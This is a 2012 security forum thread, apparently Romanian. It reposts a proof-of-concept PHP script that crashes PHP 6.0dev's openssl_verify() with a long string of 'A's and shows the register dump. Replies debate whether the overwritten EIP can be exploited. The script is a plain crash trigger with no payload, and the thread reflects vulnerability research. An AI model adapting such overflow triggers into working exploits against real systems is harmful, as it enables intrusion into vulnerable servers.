DarkyAngel Posted July 25, 2012 Report Posted July 25, 2012 PHP 6.0 openssl_verify() Local Buffer Overflow PoC<?php// ==================================================================================//// PHP 6.0 openssl_verify() Local Buffer Overflow PoC//// Tested on WIN XP, Apache, PHP 6.0dev. Local Buffer Overflow.//// Local Buffer Overflow// Author: Pr0T3cT10n <pr0t3ct10n@gmail.com>//// ==================================================================================//// REGISTERS:// EAX 000003D0, ECX 00BBDB28, EDX 00BBDAD8// EBX 00BBC940, ESP 0012FB5C UNICODE "AAA...."// ESI 00BBC940, EDI 00831D00, EBP 0012FBF0 UNICODE "AAA...."// EIP 00410041//// ==================================================================================$buffer = str_repeat("A", 1000);openssl_verify(1,1,$buffer);?># 1337day.com [2012-07-20]Sursa Quote
pyth0n3 Posted July 25, 2012 Report Posted July 25, 2012 Demonstreaza ca e vulnerabil, dar nu si faptul ca poate fi exploatat.Si e greu de exploatat chiar plecand din kernel-urile 2.6.12 dar e mai usor sa precizezi ca e vulnerabil si sa ii faci un POC decat sa demonstrezi ca poate fi exploatat. Quote
Nytro Posted July 25, 2012 Report Posted July 25, 2012 EIP 00410041E dubios, s-ar putea exploata, dar ce sunt acele 0-uri intre fiecare caracter? Pare stack overflow. Quote
pyth0n3 Posted July 25, 2012 Report Posted July 25, 2012 Pai depinde de arhitectura sistemului si cum a stampat reprezentarile registrului . Ori vine rescris in intregime ori 2 caractere zboara in alta parte ori 100 de caractere nu ajung sa rescrie toata adresa dar poate nici el saracul nu stie.De obicei uneori in sistemele 64biti vezi asemenea reprezentari. Quote
